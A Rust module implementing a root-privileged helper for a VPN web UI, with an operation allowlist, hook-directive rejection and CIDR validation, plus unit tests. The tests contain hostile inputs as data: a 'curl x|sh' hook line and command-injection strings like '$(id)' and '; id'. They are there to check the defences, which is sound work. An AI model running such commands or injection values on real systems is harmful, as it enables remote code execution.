//! Privilege separation: a root helper behind a fixed operation allowlist.
//!
//! Ported from the model in [islandr-proxy](https://github.com/chriscohnen/islandr)
//! (ADR-0012), adapted to this project's single-binary shape — the helper is a
//! subcommand of the same executable (`awg-easy-rs --privileged-helper`)
//! rather than a second artefact to build, ship, and version.
//!
//! ## The problem
//!
//! The web UI and the interface manager are the same process, and that process
//! runs as root because `awg-quick`, `awg` and `nft` need `CAP_NET_ADMIN`. So
//! any remote-code-execution bug in the HTTP layer — a parser, a dependency, a
//! handler — is instantly full control of the host. The privileged work is a
//! handful of operations; the attack surface carrying that privilege is an
//! entire web application.
//!
//! ## The split
//!
//! The helper runs as root on a Unix socket and speaks one line-delimited JSON
//! request per connection. It accepts a **fixed allowlist of operations**,
//! each executed as an argument vector — never a shell string, never a command
//! name taken from the request. The interface name and every filesystem path
//! are fixed when the helper starts and are not accepted from the wire, so a
//! caller cannot redirect an operation at another interface or another file.
//!
//! The main process then needs no capabilities at all for these operations.
//!
//! ## What this does and does not buy
//!
//! Be precise about this, because the pattern is easy to over-sell:
//!
//! - It **removes** arbitrary code execution as root, arbitrary file read and
//!   write, module loading, and persistence — the things an attacker actually
//!   wants from an RCE. Code execution is only removed because `WgSync`
//!   rejects `awg-quick` hook directives (`reject_hook_directives`): without
//!   that check, `WgSync` + `WgUp` compose into a root shell, since
//!   `awg-quick` executes `PreUp`/`PostUp` itself. Operator hooks are
//!   therefore unavailable in helper mode, and the admin API says so.
//! - It **does not** remove control of the VPN. A compromised main process can
//!   still ask for a ruleset to be applied and an interface to be
//!   reconfigured, because that is the service's entire purpose. The ruleset
//!   text is generated by the unprivileged side; the helper validates that it
//!   parses (`nft -c`) but cannot judge whether the operator wanted it.
//!
//! So it converts "root on the box" into "control of the tunnel". That is a
//! large reduction, and it is not containment.
//!
//! Operations that genuinely still need privilege and are **out of scope**
//! here: loading the `amneziawg` kernel module (done once at unit start via
//! `ExecStartPre=`), and binding the low ports the optional bundled transports
//! use (Xray on 443, MasterDnsVPN on 53) — grant those with
//! `CAP_NET_BIND_SERVICE` or leave those transports disabled.

use std::io::{BufRead, BufReader, Read, Write};
use std::os::unix::fs::PermissionsExt;
use std::os::unix::net::{UnixListener, UnixStream};
use std::path::{Path, PathBuf};
use std::process::{Command, Stdio};
use std::time::Duration;

use anyhow::{anyhow, Context, Result};
use serde::{Deserialize, Serialize};

/// Default socket path. Overridden with `WG_EASY_HELPER_SOCKET`.
pub const DEFAULT_SOCKET: &str = "/run/awg-easy-rs/helper.sock";

/// Largest request accepted, in bytes. Generated nftables rulesets for a large
/// roster are a few tens of kilobytes; a megabyte is far above any legitimate
/// value and bounds what a compromised caller can make the helper buffer.
const MAX_REQUEST_BYTES: u64 = 1024 * 1024;

// ---------------------------------------------------------------------------
// Wire format
// ---------------------------------------------------------------------------

/// One request. `op` selects from the allowlist; nothing here names a binary,
/// an interface, or a path.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "op", rename_all = "snake_case")]
pub enum Request {
    /// `awg-quick up <iface>`
    WgUp,
    /// `awg-quick down <iface>`
    WgDown,
    /// Write the interface config, then `awg syncconf` it into the running
    /// interface without a restart.
    ///
    /// `config` must not carry `awg-quick` hook directives — the helper
    /// rejects them, because `awg-quick` runs them as root and that would
    /// turn this operation plus `WgUp` into a root shell. The firewall hooks
    /// the product genuinely needs are rendered *by the helper* from
    /// `firewall`, whose fields are validated as network values, never as
    /// commands.
    WgSync {
        config: String,
        #[serde(default)]
        firewall: Option<FirewallParams>,
    },
    /// `awg show <iface> dump`
    WgShow,
    /// Validate and apply an nftables ruleset (`nft -c -f -`, then `nft -f -`).
    NftApply { ruleset: String },
    /// `nft <args>` restricted to read-only listing of this project's table.
    NftList,
    /// Liveness probe.
    Ping,
}

/// One response, always a single JSON line.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Response {
    pub ok: bool,
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub output: Option<String>,
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub error: Option<String>,
}

impl Response {
    fn ok(output: impl Into<String>) -> Self {
        Response { ok: true, output: Some(output.into()), error: None }
    }
    fn err(error: impl Into<String>) -> Self {
        Response { ok: false, output: None, error: Some(error.into()) }
    }
}

// ---------------------------------------------------------------------------
// Server
// ---------------------------------------------------------------------------

/// Everything the helper will touch, fixed at startup. None of it is
/// influenced by a request — that is the property the whole design rests on.
pub struct HelperConfig {
    pub socket_path: PathBuf,
    pub interface: String,
    pub conf_dir: PathBuf,
    /// gid allowed to connect. The socket is chmod 0660 and chowned to this
    /// group so exactly one unprivileged account can reach it, rather than
    /// every local user.
    pub allow_gid: Option<u32>,
}

impl HelperConfig {
    /// The config file this helper is willing to write. Derived from the fixed
    /// interface name, so `WgSync` cannot be pointed anywhere else.
    fn conf_path(&self) -> PathBuf {
        self.conf_dir.join(format!("{}.conf", self.interface))
    }
}

/// Run the helper until the process is killed. Blocking; intended to be the
/// whole of `main` for the `--privileged-helper` subcommand.
pub fn serve(cfg: HelperConfig) -> Result<()> {
    let parent = cfg
        .socket_path
        .parent()
        .filter(|p| !p.as_os_str().is_empty())
        .map(Path::to_path_buf)
        .unwrap_or_else(|| PathBuf::from("."));
    std::fs::create_dir_all(&parent)
        .with_context(|| format!("create socket dir {}", parent.display()))?;

    // Publish the socket by rename, not by binding the final path directly.
    //
    // `UnixListener::bind` creates the socket with the process umask applied
    // and only *then* can it be chmod'ed — under a default 0022 that leaves a
    // window where the published path exists mode 0755 and any local account
    // can connect and drive the tunnel. (Same bug class the DB snapshot path
    // documents: chmod-after-create is not good enough for a secret.)
    //
    // The obvious fix — narrow the umask across bind() and restore it after —
    // is wrong in a multithreaded process, and cost a CI failure to learn:
    // umask(2) is *process* state, so the narrowed value applies to every
    // other thread creating a file or directory during the window, and two
    // threads doing save/restore concurrently leave the process pinned at the
    // narrow value permanently. The visible damage is a directory created as
    // `drw-------` — no execute bit — after which every open() inside it
    // fails EACCES. Root never notices (it bypasses the directory permission
    // check), so this reproduces only for an unprivileged user.
    //
    // Binding an unpredictable temporary name in the same directory, fixing
    // its mode and owner while nothing can find it, then `rename(2)`-ing it
    // into place touches no process-global state at all: the published path
    // only ever exists with the final mode, and rename is atomic. The
    // listening socket is bound to the inode, so it keeps serving across the
    // rename. A stale socket at the destination is replaced by the same
    // rename, which is also why there's no unlink-first race here.
    let mut nonce = [0u8; 16];
    crate::rng::fill(&mut nonce);
    let tmp_name = format!(
        ".{}.{}.tmp",
        cfg.socket_path
            .file_name()
            .map(|n| n.to_string_lossy().into_owned())
            .unwrap_or_else(|| "helper.sock".into()),
        nonce.iter().map(|b| format!("{b:02x}")).collect::<String>()
    );
    let tmp_path = parent.join(tmp_name);
    let listener = UnixListener::bind(&tmp_path)
        .with_context(|| format!("bind {}", tmp_path.display()))?;
    // From here on any early return must not leave the temp socket behind.
    let publish = |cfg: &HelperConfig, tmp: &Path| -> Result<u32> {
        // Default to 0600 (root only) and widen to 0660 only when a group was
        // named. Getting this wrong in the permissive direction would hand
        // every local account the ability to reconfigure the tunnel, so the
        // tight mode is the one that needs no argument.
        let mode = if cfg.allow_gid.is_some() { 0o660 } else { 0o600 };
        std::fs::set_permissions(tmp, std::fs::Permissions::from_mode(mode))
            .context("chmod helper socket")?;
        if let Some(gid) = cfg.allow_gid {
            chown_gid(tmp, gid)
                .with_context(|| format!("chown helper socket to gid {gid}"))?;
        }
        std::fs::rename(tmp, &cfg.socket_path).with_context(|| {
            format!(
                "publish helper socket {} -> {}",
                tmp.display(),
                cfg.socket_path.display()
            )
        })?;
        Ok(mode)
    };
    let mode = match publish(&cfg, &tmp_path) {
        Ok(m) => m,
        Err(e) => {
            std::fs::remove_file(&tmp_path).ok();
            return Err(e);
        }
    };

    crate::info!(
        "privileged helper listening on {} (interface {}, mode {:o})",
        cfg.socket_path.display(),
        cfg.interface,
        mode
    );

    for stream in listener.incoming() {
        match stream {
            Ok(s) => {
                if let Err(e) = handle_connection(&cfg, s) {
                    // One bad connection must never take the helper down: it
                    // is the only path the main process has to the interface.
                    crate::warn!("helper connection failed: {e:#}");
                }
            }
            Err(e) => crate::warn!("helper accept failed: {e}"),
        }
    }
    Ok(())
}

/// How long one connection may hold the helper's single-threaded accept loop.
///
/// The loop serves connections one at a time, so without a deadline a caller
/// that connects and never writes wedges the only privileged control path the
/// main process has. Generous enough for a large ruleset over a local socket.
const IO_TIMEOUT: Duration = Duration::from_secs(30);

fn handle_connection(cfg: &HelperConfig, stream: UnixStream) -> Result<()> {
    // Applies to this connection only; the listener is unaffected.
    stream.set_read_timeout(Some(IO_TIMEOUT)).ok();
    stream.set_write_timeout(Some(IO_TIMEOUT)).ok();
    let mut reader = BufReader::new(stream.try_clone()?);
    let mut line = String::new();
    // Bounded read: an unterminated line from a compromised caller must not
    // grow until the helper is OOM-killed.
    reader
        .by_ref()
        .take(MAX_REQUEST_BYTES)
        .read_line(&mut line)?;

    let response = match serde_json::from_str::<Request>(line.trim()) {
        Ok(req) => dispatch(cfg, req),
        // Deliberately does not echo the input back: the error goes to a log
        // the caller may be able to read.
        Err(e) => Response::err(format!("malformed request: {e}")),
    };

    let mut out = stream;
    let mut body = serde_json::to_string(&response)?;
    body.push('\n');
    out.write_all(body.as_bytes())?;
    out.flush()?;
    Ok(())
}

fn dispatch(cfg: &HelperConfig, req: Request) -> Response {
    let result = match req {
        Request::Ping => Ok("pong".to_string()),
        Request::WgUp => run(&["awg-quick", "up", &cfg.interface]).map(|_| String::new()),
        Request::WgDown => run(&["awg-quick", "down", &cfg.interface]).map(|_| String::new()),
        Request::WgShow => run(&["awg", "show", &cfg.interface, "dump"]),
        Request::WgSync { config, firewall } => {
            wg_sync(cfg, &config, firewall.as_ref()).map(|_| String::new())
        }
        Request::NftApply { ruleset } => nft_apply(&ruleset).map(|_| String::new()),
        Request::NftList => run(&["nft", "list", "table", "inet", "awg-easy-rs"]),
    };
    match result {
        Ok(output) => Response::ok(output),
        Err(e) => {
            // Log the detail with root's view, return a generic message. `nft`
            // parses `include "<path>"`, so its diagnostics can quote file
            // content the unprivileged caller must not receive — the helper
            // exists precisely to stop that process reading root's files.
            crate::warn!("privileged operation failed: {e:#}");
            Response::err(
                "privileged operation failed; see the helper's log for detail".to_string(),
            )
        }
    }
}

/// Write the interface config and sync it into the running interface.
///
/// The path is derived from the helper's fixed interface name, never from the
/// request, so this cannot be turned into an arbitrary-file-write primitive —
/// which is the single most valuable thing an attacker could extract from a
/// root helper.
/// Network parameters the helper needs to render the firewall hooks itself.
///
/// These are the only caller-supplied values that reach a rendered command,
/// and each is validated as a network value before substitution
/// ([`FirewallParams::validate`]). The command text around them is a
/// compile-time constant, so the caller chooses addresses, never syntax.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct FirewallParams {
    pub ipv4_cidr: String,
    pub ipv6_cidr: String,
    pub port: u16,
}

impl FirewallParams {
    /// Reject anything that is not a bare CIDR. `ipnet` parsing is the whole
    /// check: it accepts `10.8.0.0/24` and rejects every string carrying a
    /// space, quote, semicolon, newline, or substitution — i.e. everything
    /// that could add a command to the rendered hook.
    fn validate(&self) -> Result<()> {
        for (label, v) in [("ipv4Cidr", &self.ipv4_cidr), ("ipv6Cidr", &self.ipv6_cidr)] {
            if v.parse::<crate::cidr::IpNet>().is_err() {
                anyhow::bail!("firewall.{label} is not a CIDR: {v:?}");
            }
        }
        Ok(())
    }

    /// Render the helper's own hook lines. The templates are the same
    /// constants the non-helper path uses, so the resulting ruleset is
    /// identical; only the authority that renders them differs.
    fn render(&self, device: &str) -> Result<String> {
        self.validate()?;
        let port = self.port.to_string();
        let subst = |t: &str| {
            t.replace("{{device}}", device)
                .replace("{{port}}", &port)
                .replace("{{ipv4Cidr}}", &self.ipv4_cidr)
                .replace("{{ipv6Cidr}}", &self.ipv6_cidr)
        };
        Ok(format!(
            "\nPostUp = {}\nPostDown = {}",
            subst(crate::db::POST_UP_TEMPLATE),
            subst(crate::db::POST_DOWN_TEMPLATE),
        ))
    }
}

/// Directives `awg-quick` executes as a shell command when it brings the
/// interface up or down.
const HOOK_DIRECTIVES: [&str; 4] = ["preup", "postup", "predown", "postdown"];

/// Refuse a config that carries an `awg-quick` hook directive.
///
/// This is the boundary that makes the operation allowlist mean something.
/// `WgSync` takes caller-supplied config text and `WgUp` runs `awg-quick up`
/// over it, and `awg-quick` executes `PreUp`/`PostUp`/`PreDown`/`PostDown` as
/// root — so without this check the two allowlisted operations compose into
/// arbitrary root command execution, which is exactly what the privilege split
/// exists to prevent. The unprivileged side never needs these in helper mode:
/// `api/admin.rs` refuses to store them, and `config_gen` omits empty ones.
///
/// Matching is deliberately generous — case-insensitive, leading whitespace
/// ignored, and `=` allowed to be spaced or not — because this rejects rather
/// than sanitizes, so over-matching costs an error message and under-matching
/// costs root.
pub(crate) fn reject_hook_directives(config: &str) -> Result<()> {
    for (n, line) in config.lines().enumerate() {
        let line = line.trim_start();
        if line.starts_with('#') {
            continue;
        }
        let Some((key, _)) = line.split_once('=') else {
            continue;
        };
        let key = key.trim().to_ascii_lowercase();
        if HOOK_DIRECTIVES.contains(&key.as_str()) {
            anyhow::bail!(
                "refusing config: line {} carries the `{}` directive, which \
                 awg-quick executes as root. Hooks are unavailable while the \
                 privileged helper is in use.",
                n + 1,
                key
            );
        }
    }
    Ok(())
}

fn wg_sync(cfg: &HelperConfig, config: &str, firewall: Option<&FirewallParams>) -> Result<()> {
    reject_hook_directives(config)?;
    let owned = match firewall {
        Some(fw) => fw.render(&cfg.interface)?,
        None => String::new(),
    };
    let config = &format!("{config}{owned}");
    let path = cfg.conf_path();
    std::fs::create_dir_all(&cfg.conf_dir).ok();
    // Create with 0600 rather than writing and chmod'ing afterwards: this file
    // carries the server private key, and `fs::write` + `set_permissions`
    // leaves it world-readable for the duration of the write. `.mode()` is
    // applied by open(2) itself, so there is no window at all.
    {
        use std::os::unix::fs::OpenOptionsExt;
        let mut f = std::fs::OpenOptions::new()
            .write(true)
            .create(true)
            .truncate(true)
            .mode(0o600)
            .open(&path)
            .with_context(|| format!("open {}", path.display()))?;
        f.write_all(config.as_bytes())
            .with_context(|| format!("write {}", path.display()))?;
    }
    // An existing file keeps its old mode through O_CREAT, so still enforce it.
    std::fs::set_permissions(&path, std::fs::Permissions::from_mode(0o600))
        .with_context(|| format!("chmod {}", path.display()))?;

    // Interface not up yet: writing the config is the whole job, and the next
    // `WgUp` will read it. Not an error.
    if run(&["awg", "show", &cfg.interface]).is_err() {
        return Ok(());
    }
    let stripped = run(&["awg-quick", "strip", &cfg.interface])?;
    run_with_stdin(&["awg", "syncconf", &cfg.interface, "/dev/stdin"], &stripped).map(|_| ())
}

/// Validate then apply an nftables ruleset.
///
/// The dry run is not cosmetic: `nft -f` applies statements up to the point it
/// fails, so an invalid ruleset can leave the firewall half-built — open in
/// ways neither the old nor the new ruleset describes. `-c` parses the whole
/// thing first, making application all-or-nothing in practice.
fn nft_apply(ruleset: &str) -> Result<()> {
    run_with_stdin(&["nft", "-c", "-f", "/dev/stdin"], ruleset)
        .context("nftables ruleset failed validation; not applied")?;
    run_with_stdin(&["nft", "-f", "/dev/stdin"], ruleset).map(|_| ())
}

/// Execute an argument vector. No shell, and `argv[0]` always comes from a
/// literal in this file — never from a request.
fn run(argv: &[&str]) -> Result<String> {
    let (prog, args) = argv.split_first().ok_or_else(|| anyhow!("empty argv"))?;
    let out = Command::new(prog)
        .args(args)
        .output()
        .with_context(|| format!("spawn {prog}"))?;
    if !out.status.success() {
        return Err(anyhow!(
            "{prog} failed: {}",
            String::from_utf8_lossy(&out.stderr).trim()
        ));
    }
    Ok(String::from_utf8_lossy(&out.stdout).trim().to_string())
}

fn run_with_stdin(argv: &[&str], input: &str) -> Result<String> {
    let (prog, args) = argv.split_first().ok_or_else(|| anyhow!("empty argv"))?;
    let mut child = Command::new(prog)
        .args(args)
        .stdin(Stdio::piped())
        .stdout(Stdio::piped())
        .stderr(Stdio::piped())
        .spawn()
        .with_context(|| format!("spawn {prog}"))?;
    if let Some(mut sin) = child.stdin.take() {
        sin.write_all(input.as_bytes())?;
    }
    let out = child.wait_with_output()?;
    if !out.status.success() {
        return Err(anyhow!(
            "{prog} failed: {}",
            String::from_utf8_lossy(&out.stderr).trim()
        ));
    }
    Ok(String::from_utf8_lossy(&out.stdout).trim().to_string())
}

/// `chown :gid` on the socket. `None` for uid leaves the owner (root) alone.
fn chown_gid(path: &Path, gid: u32) -> Result<()> {
    std::os::unix::fs::chown(path, None, Some(gid))?;
    Ok(())
}

// ---------------------------------------------------------------------------
// Client
// ---------------------------------------------------------------------------

/// Path of the helper socket, if this process is configured to use one.
///
/// `None` means no helper: callers fall back to executing the commands
/// directly, which is the pre-existing single-process behaviour and remains
/// the default so an upgrade changes nothing until the operator opts in.
pub fn socket_path() -> Option<PathBuf> {
    match std::env::var("WG_EASY_HELPER_SOCKET") {
        Ok(p) if !p.is_empty() => Some(PathBuf::from(p)),
        _ => None,
    }
}

/// True when this process should route privileged work through the helper.
pub fn is_enabled() -> bool {
    socket_path().is_some()
}

/// Send one request and read one response.
pub fn call(req: &Request) -> Result<String> {
    let path = socket_path().ok_or_else(|| anyhow!("helper socket not configured"))?;
    let stream = UnixStream::connect(&path)
        .with_context(|| format!("connect helper socket {}", path.display()))?;

    let mut body = serde_json::to_string(req)?;
    body.push('\n');
    (&stream).write_all(body.as_bytes())?;
    (&stream).flush()?;

    let mut reader = BufReader::new(&stream);
    let mut line = String::new();
    reader
        .by_ref()
        .take(MAX_REQUEST_BYTES)
        .read_line(&mut line)?;

    let resp: Response =
        serde_json::from_str(line.trim()).context("helper returned a malformed response")?;
    if resp.ok {
        Ok(resp.output.unwrap_or_default())
    } else {
        Err(anyhow!(
            "helper refused: {}",
            resp.error.unwrap_or_else(|| "unknown error".into())
        ))
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn requests_round_trip_as_tagged_json() {
        let r = Request::WgSync { config: "[Interface]\n".into(), firewall: None };
        let s = serde_json::to_string(&r).unwrap();
        assert!(s.contains("\"op\":\"wg_sync\""));
        assert!(matches!(
            serde_json::from_str::<Request>(&s).unwrap(),
            Request::WgSync { .. }
        ));
    }

    #[test]
    fn hook_directives_in_a_sync_config_are_rejected() {
        // `awg-quick` runs these as root, so accepting one would make
        // WgSync + WgUp an arbitrary-root-command primitive.
        for bad in [
            "[Interface]\nPostUp = id\n",
            "[Interface]\npostup = id\n",
            "[Interface]\n  PreUp=/bin/sh -c 'curl x|sh'\n",
            "[Interface]\nPostDown\t=\tid\n",
            "[Interface]\nPreDown = id\n",
        ] {
            assert!(
                reject_hook_directives(bad).is_err(),
                "should have rejected: {bad:?}"
            );
        }
    }

    #[test]
    fn ordinary_config_lines_are_not_mistaken_for_hooks() {
        // The rejection must not swallow a legitimate config: `MTU`, an
        // AWG knob, a commented-out hook, and a key whose value merely
        // mentions a hook name all have to pass.
        let ok = "[Interface]\nPrivateKey = abc=\nAddress = 10.8.0.1\n\
                  ListenPort = 51820\nMTU = 1420\nS1 = 15\nH1 = 5\n\
                  # PostUp = id\nJc = 4\n";
        assert!(reject_hook_directives(ok).is_ok());
    }

    #[test]
    fn helper_renders_its_own_hooks_and_rejects_non_cidr_params() {
        let fw = FirewallParams {
            ipv4_cidr: "10.8.0.0/24".into(),
            ipv6_cidr: "fdcc:ad94:bacf:61a3::/64".into(),
            port: 51820,
        };
        let rendered = fw.render("awg0").expect("valid params render");
        assert!(rendered.contains("PostUp = nft add table inet awg-easy-rs"));
        assert!(rendered.contains("10.8.0.0/24"));
        assert!(rendered.contains("51820"));

        // Anything that could add a command to the rendered line is not a
        // CIDR, so the parse gate is the whole defence.
        for bad in [
            "10.8.0.0/24; id",
            "10.8.0.0/24 && id",
            "$(id)",
            "10.8.0.0/24\nPostUp = id",
            "",
        ] {
            let fw = FirewallParams {
                ipv4_cidr: bad.into(),
                ipv6_cidr: "fdcc::/64".into(),
                port: 51820,
            };
            assert!(fw.render("awg0").is_err(), "should have rejected: {bad:?}");
        }
    }

    #[test]
    fn unknown_ops_are_rejected() {
        // The allowlist is the enum: anything not named in it fails to parse,
        // so there is no path from the wire to an arbitrary command.
        assert!(serde_json::from_str::<Request>(r#"{"op":"exec","cmd":"sh"}"#).is_err());
        assert!(serde_json::from_str::<Request>(r#"{"op":"wg_up","iface":"other"}"#).is_ok());
    }

    #[test]
    fn interface_name_in_a_request_is_ignored() {
        // A caller may send extra fields; none of them can redirect the
        // operation, because dispatch reads the interface from HelperConfig.
        let req: Request =
            serde_json::from_str(r#"{"op":"wg_show","interface":"eth0"}"#).unwrap();
        assert!(matches!(req, Request::WgShow));
    }

    #[test]
    fn conf_path_is_derived_from_the_fixed_interface() {
        let cfg = HelperConfig {
            socket_path: "/run/x.sock".into(),
            interface: "awg0".into(),
            conf_dir: "/etc/wireguard".into(),
            allow_gid: None,
        };
        assert_eq!(cfg.conf_path(), Path::new("/etc/wireguard/awg0.conf"));
    }

    /// `serve()` must not touch the process umask — not even transiently.
    ///
    /// The earlier implementation narrowed it across `bind()` and restored
    /// it after. That is process state, so concurrent helpers (and any
    /// unrelated thread creating a file during the window) inherited the
    /// narrowed value, and two overlapping save/restore pairs pinned the
    /// process at `0o177` for good. The damage shows up as a directory
    /// created `drw-------` and every open() inside it failing EACCES —
    /// invisible as root, fatal for an ordinary user, which is exactly how
    /// it reached main and only broke in CI. This asserts both halves: the
    /// umask survives concurrent starts, and each socket still lands 0600.
    #[test]
    #[serial_test::serial(process_umask)]
    fn concurrent_serve_does_not_leak_the_narrowed_umask() {
        let before = unsafe { libc::umask(0o022) };
        unsafe { libc::umask(0o022) };

        let base = std::env::temp_dir().join(format!("awg-umask-race-{}", std::process::id()));
        let _ = std::fs::remove_dir_all(&base);
        std::fs::create_dir_all(&base).unwrap();

        let mut sockets = Vec::new();
        for i in 0..6 {
            let socket = base.join(format!("h{i}.sock"));
            sockets.push(socket.clone());
            let cfg = HelperConfig {
                socket_path: socket,
                interface: "awg0".into(),
                conf_dir: base.join(format!("wg{i}")),
                allow_gid: None,
            };
            std::thread::spawn(move || {
                let _ = serve(cfg);
            });
        }
        for s in &sockets {
            for _ in 0..300 {
                if s.exists() {
                    break;
                }
                std::thread::sleep(std::time::Duration::from_millis(10));
            }
            assert!(s.exists(), "helper socket {} never appeared", s.display());
        }

        let after = unsafe { libc::umask(0o022) };
        unsafe { libc::umask(before) };

        let modes: Vec<u32> = sockets
            .iter()
            .map(|s| std::fs::metadata(s).unwrap().permissions().mode() & 0o777)
            .collect();
        let _ = std::fs::remove_dir_all(&base);

        assert_eq!(
            after, 0o022,
            "serve() disturbed the process umask (got {after:#o}); every later \
             mkdir in this process loses the execute bit"
        );
        assert!(
            modes.iter().all(|m| *m == 0o600),
            "published sockets must be owner-only, got {modes:?}"
        );
    }

    #[test]
    fn responses_round_trip() {
        let r: Response = serde_json::from_str(r#"{"ok":true,"output":"x"}"#).unwrap();
        assert!(r.ok);
        assert_eq!(r.output.as_deref(), Some("x"));
        let e: Response = serde_json::from_str(r#"{"ok":false,"error":"nope"}"#).unwrap();
        assert!(!e.ok);
    }
}
